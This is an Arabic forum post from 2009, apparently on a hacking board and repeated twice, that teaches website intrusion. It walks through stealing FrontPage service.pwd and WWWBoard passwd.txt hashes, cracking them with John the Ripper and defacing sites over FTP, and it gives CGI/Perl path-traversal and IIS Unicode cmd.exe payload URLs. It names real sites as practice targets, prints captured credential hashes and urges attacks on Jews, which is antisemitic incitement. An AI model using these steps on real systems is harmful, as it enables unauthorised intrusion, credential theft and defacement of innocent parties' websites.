محمود
07-13-2009, 03:27 PM
شرح الثغرات واستغلالها
1 - شرح ثغرة الفرونت بيج وكيفية استغلالها:
ثغرة الفرونت بيج هي ثغرة منتشرة جدا بين المواقع وتأتي عادة بهذا الشكل
http://www.****.com/_vti_pvt (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%2a%2a%2a%2a%2e%63%6f%6d%2f%5f%76%74%69%5f%70%76 %74)
يعني الثغرة هي
_vti_pvt
ومن خلال هذه الثغرة تظهر لك ملفات الموقع (الفرونت بيج) او المشرف
ملاحظة:-
تنفذ الثغرة وتوجد على المواقع التي صممت بالفرونت بيج ولا تصلح لغيرها
لتعرق اذا الموقع مصمم بالفرونت بيج من موقع
http://www.netcraft.net/ (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%6e%65%74%63%72%61%66%74%2e%6e%65%74%2f)
تدخل الموقع تشوف قدامك مستطيل أدخل الموقع اللي تبي تجمع معلومات حوله
ويهمنا ملف واحد ومن غيره لانستفيد شيئا وهو
service.pwd
نفتحه بالمفكرة وتشوف الباسوورد لكن هاي الباسوورد مشفرة وتكون بهذا الشكل
-FrontPage-
ekendall:bYld1Sr73NLKo
louisa:5zm94d7cdDFiQ
هنا نرى ان الموقع عليه مشرفين
ekendall
و
louisa
نفك التشفير بواسطة برنامج جون ذا ريبر طبعا وبعد فك التشفير بالجون ذا ريبر تروح للفرونت بيج
file
open ***
وتحط الموقع فتطلعلك الصفحة الرئيسية فغير اللي بدك اياه بعدين
save or publish
بعدين بيطلب منك كلمة السر والاسم طبعا الشغلة سهلة تحط الاسم وكلمة السر وتحط
sign
وهذا موقع للتطبيق
http://www.heyerlist.org/garderobe/_vti_pvt (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%68%65%79%65%72%6c%69%73%74%2e%6f%72%67%2f%67%61 %72%64%65%72%6f%62%65%2f%5f%76%74%69%5f%70%76%74)
-------------------------------------------------------------------
2 - شرح ثغرة ملف الباسوورد وكيفية استغلالها:
ثغرة الـ
WWWBoard
هي أسهل ثغرة بالإضافة إلى الفرونت بيج.
لنفترض أن الموقع المراد إختراقه هو
http://www.boardprep.net/ (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%62%6f%61%72%64%70%72%65%70%2e%6e%65%74%2f)
لنضف إليه
wwwboard/passwd.txt
فيصبح العنوان
http://www.boardprep.net/wwwboard/passwd.txt (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%62%6f%61%72%64%70%72%65%70%2e%6e%65%74%2fwwwboa rd/passwd.txt)
نفتح العنوان سوف تجد
cknouse:aexMVWnDOyrdE
كلمة المرور+ إسم المستخدم
يعني إسم المستخدم هو
cknouse
وكلمة المرور هي
aexMVWnDOyrdE
فك تشفيره بجون ذي ريبر الحين عندك إسم المستخدم وكلمة المرور وش تسوي عشان تغير الصفحة الرئيسية
روح للفتب وإكتب ftp.domen.com (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%66%74%70% 2e%64%6f%6d%65%6e%2e%63%6f%6d%2f)
ملاحظة إستبدل
domen.com
بإسم الموقع إلي عندك باسوورده
وحط اليوزر نيم والباسوورد وإدخل على الموقع أنشئ صفحة بإسم
index.html
وإرفعها للموقع
لتحميل الفتب
http://members.home.nl/patrick.pagina/temp/Ws-ftp32.zip (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%6d%65%6d% 62%65%72%73%2e%68%6f%6d%65%2e%6e%6c%2f%70%61%74%72 %69%63%6b%2e%70%61%67%69%6e%61%2f%74%65%6d%70%2f%5 7%73%2d%66%74%70%33%32%2e%7a%69%70)
- شرح ثغرة سي جي اي وكيفية استغلالها:
CGI bugs
وبعضها يمكن استخدامها مباشرة من المتصفح مثل اليونيكود وبعض ثغرات السي جي آي
ولكن بعض أو أكثر ثغرات المتصفح يتم التأكد فقط من وجودها من خلال المتصفح.
الثغرات التي يمكن استغلالها من المتصفح مباشرة مثل
/cgi-bin/passwd.txt
إذا كان الموقع هو
http://www.somesite.com/ (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%73%6f%6d%65%73%69%74%65%2e%63%6f%6d%2f)
فتكتب الثغرة هكذا في المتفح
http://www.somesite.com/cgi-bin/passwd.txt (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%73%6f%6d%65%73%69%74%65%2e%63%6f%6d%2fcgi-bin/passwd.txt)
هذه الثغرة تعرض لك أسماء المستخدمين وكلمات
المرور للمستخدمين للموقع مثل المدير وكل من يسمح له بدخول قاعدة بيانات الموقع
طبعا لا تحاول تجربة هذه الثغرة الآن ...إلا إذا كنت تريد اختراق موقع في زيمبابوي نسيه أصحابه من 10 سنين حتى هذه الثغرة يمكن الا تصلح معهم لانها صارت معروفة.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
استغلال العيب في ملفات
Cgi & Perl
للوصول الى
etc/passwd
اولا: سناخذ الثغرات من نوع
Show Files
اولا عند وجود هذا الملف
/cgi-bin/apexec.pl?
الباسوورد علينا استغلال هذه الثغرة للوصول الى
http://www.target.com/ (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%74%61%72%67%65%74%2e%63%6f%6d%2f)
../../../../../etc/resolv.conf%00.html&passurl=/category/
مع امكانية تغيير
path
بالملف المراد
هذا من جهة البيرل ونفس الكلام ينطبق على السي جي اي
/cgi-bin/hsx.cgi?
عند وجود هذا الملف في
/cgi-bin/
طبق الثغرة التالية
http://www.target.com/cgi-bin/hsx.c..../etc/passwd (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%74%61%72%67%65%74%2e%63%6f%6d%2fcgi-bin/hsx.c..../etc/passwd)
الطريقة المثلى للبحث عن هذه الملفات اما بالاختراق العشوائي او عن استخدام برنامج سكان للبحث عن ثغرات في الموقع ضع هذه الملفات ضمن لائحة الثغرات
مثل /cgi-bin/hsx.cgi?
وعند وجوده يتم تطبيق ثغرته.
-------------------------------------------------------------------
4 - شرح ثغرة اي اي اس وكيفية استغلالها:
IIS = Inetnet Information Service
و نستخدم ثغراته المعروفه باليونيكودز
Unicodes
و هي كثيره جدا و انا اعني ما اقول
مثل :
**********************************************
http://www.xxxx.com/******s/..&Aacu...d.exe?/c+dir+c: (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%78%78%78%78%2e%63%6f%6d%2f%2a%2a%2a%2a%2a%2a%73 %2f%2e%2e%26%61%6d%70%3b%41%61%63%75%2e%2e%2e%64%2 e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a)
http://www.xxxx.com/******s/..&Agra...d.exe?/c+dir+c: (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%78%78%78%78%2e%63%6f%6d%2f%2a%2a%2a%2a%2a%2a%73 %2f%2e%2e%26%61%6d%70%3b%41%67%72%61%2e%2e%2e%64%2 e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a)
http://www.xxxx.com/******s/..&Agra...d.exe?/c+dir+c: (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%78%78%78%78%2e%63%6f%6d%2f%2a%2a%2a%2a%2a%2a%73 %2f%2e%2e%26%61%6d%70%3b%41%67%72%61%2e%2e%2e%64%2 e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a)
http://www.xxxx.com/******s/..&Agra...d.exe?/c+dir+c: (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%78%78%78%78%2e%63%6f%6d%2f%2a%2a%2a%2a%2a%2a%73 %2f%2e%2e%26%61%6d%70%3b%41%67%72%61%2e%2e%2e%64%2 e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a)
http://www.xxxx.com/******s/..&Aacu...d.exe?/c+dir+c: (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%78%78%78%78%2e%63%6f%6d%2f%2a%2a%2a%2a%2a%2a%73 %2f%2e%2e%26%61%6d%70%3b%41%61%63%75%2e%2e%2e%64%2 e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a)
http://www.xxxx.com/******s/..&Aacu...d.exe?/c+dir+c: (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%78%78%78%78%2e%63%6f%6d%2f%2a%2a%2a%2a%2a%2a%73 %2f%2e%2e%26%61%6d%70%3b%41%61%63%75%2e%2e%2e%64%2 e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a)
http://www.xxxx.com/******s/..&Aacu.../cmd.exe?/c+dir (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%78%78%78%78%2e%63%6f%6d%2f%2a%2a%2a%2a%2a%2a%73 %2f%2e%2e%26%61%6d%70%3b%41%61%63%75%2e%2e%2e%2f%6 3%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72)
+c:
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
أرجو التطبيق على اليهود والمواقع الإباحيه فقط اللهم بلغت اللهم فاشهد
بس يارب يعجب أمين:c98d2d602177da299c9
شو رايك يا أمين؟؟؟
أرجو أن يكون الموضوع حاز على إعجابكمq2
1 - شرح ثغرة الفرونت بيج وكيفية استغلالها:
ثغرة الفرونت بيج هي ثغرة منتشرة جدا بين المواقع وتأتي عادة بهذا الشكل
http://www.****.com/_vti_pvt (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%2a%2a%2a%2a%2e%63%6f%6d%2f%5f%76%74%69%5f%70%76 %74)
يعني الثغرة هي
_vti_pvt
ومن خلال هذه الثغرة تظهر لك ملفات الموقع (الفرونت بيج) او المشرف
ملاحظة:-
تنفذ الثغرة وتوجد على المواقع التي صممت بالفرونت بيج ولا تصلح لغيرها
لتعرق اذا الموقع مصمم بالفرونت بيج من موقع
http://www.netcraft.net/ (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%6e%65%74%63%72%61%66%74%2e%6e%65%74%2f)
تدخل الموقع تشوف قدامك مستطيل أدخل الموقع اللي تبي تجمع معلومات حوله
ويهمنا ملف واحد ومن غيره لانستفيد شيئا وهو
service.pwd
نفتحه بالمفكرة وتشوف الباسوورد لكن هاي الباسوورد مشفرة وتكون بهذا الشكل
-FrontPage-
ekendall:bYld1Sr73NLKo
louisa:5zm94d7cdDFiQ
هنا نرى ان الموقع عليه مشرفين
ekendall
و
louisa
نفك التشفير بواسطة برنامج جون ذا ريبر طبعا وبعد فك التشفير بالجون ذا ريبر تروح للفرونت بيج
file
open ***
وتحط الموقع فتطلعلك الصفحة الرئيسية فغير اللي بدك اياه بعدين
save or publish
بعدين بيطلب منك كلمة السر والاسم طبعا الشغلة سهلة تحط الاسم وكلمة السر وتحط
sign
وهذا موقع للتطبيق
http://www.heyerlist.org/garderobe/_vti_pvt (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%68%65%79%65%72%6c%69%73%74%2e%6f%72%67%2f%67%61 %72%64%65%72%6f%62%65%2f%5f%76%74%69%5f%70%76%74)
-------------------------------------------------------------------
2 - شرح ثغرة ملف الباسوورد وكيفية استغلالها:
ثغرة الـ
WWWBoard
هي أسهل ثغرة بالإضافة إلى الفرونت بيج.
لنفترض أن الموقع المراد إختراقه هو
http://www.boardprep.net/ (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%62%6f%61%72%64%70%72%65%70%2e%6e%65%74%2f)
لنضف إليه
wwwboard/passwd.txt
فيصبح العنوان
http://www.boardprep.net/wwwboard/passwd.txt (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%62%6f%61%72%64%70%72%65%70%2e%6e%65%74%2fwwwboa rd/passwd.txt)
نفتح العنوان سوف تجد
cknouse:aexMVWnDOyrdE
كلمة المرور+ إسم المستخدم
يعني إسم المستخدم هو
cknouse
وكلمة المرور هي
aexMVWnDOyrdE
فك تشفيره بجون ذي ريبر الحين عندك إسم المستخدم وكلمة المرور وش تسوي عشان تغير الصفحة الرئيسية
روح للفتب وإكتب ftp.domen.com (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%66%74%70% 2e%64%6f%6d%65%6e%2e%63%6f%6d%2f)
ملاحظة إستبدل
domen.com
بإسم الموقع إلي عندك باسوورده
وحط اليوزر نيم والباسوورد وإدخل على الموقع أنشئ صفحة بإسم
index.html
وإرفعها للموقع
لتحميل الفتب
http://members.home.nl/patrick.pagina/temp/Ws-ftp32.zip (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%6d%65%6d% 62%65%72%73%2e%68%6f%6d%65%2e%6e%6c%2f%70%61%74%72 %69%63%6b%2e%70%61%67%69%6e%61%2f%74%65%6d%70%2f%5 7%73%2d%66%74%70%33%32%2e%7a%69%70)
- شرح ثغرة سي جي اي وكيفية استغلالها:
CGI bugs
وبعضها يمكن استخدامها مباشرة من المتصفح مثل اليونيكود وبعض ثغرات السي جي آي
ولكن بعض أو أكثر ثغرات المتصفح يتم التأكد فقط من وجودها من خلال المتصفح.
الثغرات التي يمكن استغلالها من المتصفح مباشرة مثل
/cgi-bin/passwd.txt
إذا كان الموقع هو
http://www.somesite.com/ (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%73%6f%6d%65%73%69%74%65%2e%63%6f%6d%2f)
فتكتب الثغرة هكذا في المتفح
http://www.somesite.com/cgi-bin/passwd.txt (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%73%6f%6d%65%73%69%74%65%2e%63%6f%6d%2fcgi-bin/passwd.txt)
هذه الثغرة تعرض لك أسماء المستخدمين وكلمات
المرور للمستخدمين للموقع مثل المدير وكل من يسمح له بدخول قاعدة بيانات الموقع
طبعا لا تحاول تجربة هذه الثغرة الآن ...إلا إذا كنت تريد اختراق موقع في زيمبابوي نسيه أصحابه من 10 سنين حتى هذه الثغرة يمكن الا تصلح معهم لانها صارت معروفة.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
استغلال العيب في ملفات
Cgi & Perl
للوصول الى
etc/passwd
اولا: سناخذ الثغرات من نوع
Show Files
اولا عند وجود هذا الملف
/cgi-bin/apexec.pl?
الباسوورد علينا استغلال هذه الثغرة للوصول الى
http://www.target.com/ (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%74%61%72%67%65%74%2e%63%6f%6d%2f)
../../../../../etc/resolv.conf%00.html&passurl=/category/
مع امكانية تغيير
path
بالملف المراد
هذا من جهة البيرل ونفس الكلام ينطبق على السي جي اي
/cgi-bin/hsx.cgi?
عند وجود هذا الملف في
/cgi-bin/
طبق الثغرة التالية
http://www.target.com/cgi-bin/hsx.c..../etc/passwd (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%74%61%72%67%65%74%2e%63%6f%6d%2fcgi-bin/hsx.c..../etc/passwd)
الطريقة المثلى للبحث عن هذه الملفات اما بالاختراق العشوائي او عن استخدام برنامج سكان للبحث عن ثغرات في الموقع ضع هذه الملفات ضمن لائحة الثغرات
مثل /cgi-bin/hsx.cgi?
وعند وجوده يتم تطبيق ثغرته.
-------------------------------------------------------------------
4 - شرح ثغرة اي اي اس وكيفية استغلالها:
IIS = Inetnet Information Service
و نستخدم ثغراته المعروفه باليونيكودز
Unicodes
و هي كثيره جدا و انا اعني ما اقول
مثل :
**********************************************
http://www.xxxx.com/******s/..&Aacu...d.exe?/c+dir+c: (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%78%78%78%78%2e%63%6f%6d%2f%2a%2a%2a%2a%2a%2a%73 %2f%2e%2e%26%61%6d%70%3b%41%61%63%75%2e%2e%2e%64%2 e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a)
http://www.xxxx.com/******s/..&Agra...d.exe?/c+dir+c: (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%78%78%78%78%2e%63%6f%6d%2f%2a%2a%2a%2a%2a%2a%73 %2f%2e%2e%26%61%6d%70%3b%41%67%72%61%2e%2e%2e%64%2 e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a)
http://www.xxxx.com/******s/..&Agra...d.exe?/c+dir+c: (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%78%78%78%78%2e%63%6f%6d%2f%2a%2a%2a%2a%2a%2a%73 %2f%2e%2e%26%61%6d%70%3b%41%67%72%61%2e%2e%2e%64%2 e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a)
http://www.xxxx.com/******s/..&Agra...d.exe?/c+dir+c: (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%78%78%78%78%2e%63%6f%6d%2f%2a%2a%2a%2a%2a%2a%73 %2f%2e%2e%26%61%6d%70%3b%41%67%72%61%2e%2e%2e%64%2 e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a)
http://www.xxxx.com/******s/..&Aacu...d.exe?/c+dir+c: (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%78%78%78%78%2e%63%6f%6d%2f%2a%2a%2a%2a%2a%2a%73 %2f%2e%2e%26%61%6d%70%3b%41%61%63%75%2e%2e%2e%64%2 e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a)
http://www.xxxx.com/******s/..&Aacu...d.exe?/c+dir+c: (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%78%78%78%78%2e%63%6f%6d%2f%2a%2a%2a%2a%2a%2a%73 %2f%2e%2e%26%61%6d%70%3b%41%61%63%75%2e%2e%2e%64%2 e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a)
http://www.xxxx.com/******s/..&Aacu.../cmd.exe?/c+dir (http://www.2napal.com/vb/redirector.php?url=%68%74%74%70%3a%2f%2f%77%77%77% 2e%78%78%78%78%2e%63%6f%6d%2f%2a%2a%2a%2a%2a%2a%73 %2f%2e%2e%26%61%6d%70%3b%41%61%63%75%2e%2e%2e%2f%6 3%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72)
+c:
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
أرجو التطبيق على اليهود والمواقع الإباحيه فقط اللهم بلغت اللهم فاشهد
بس يارب يعجب أمين:c98d2d602177da299c9
شو رايك يا أمين؟؟؟
أرجو أن يكون الموضوع حاز على إعجابكمq2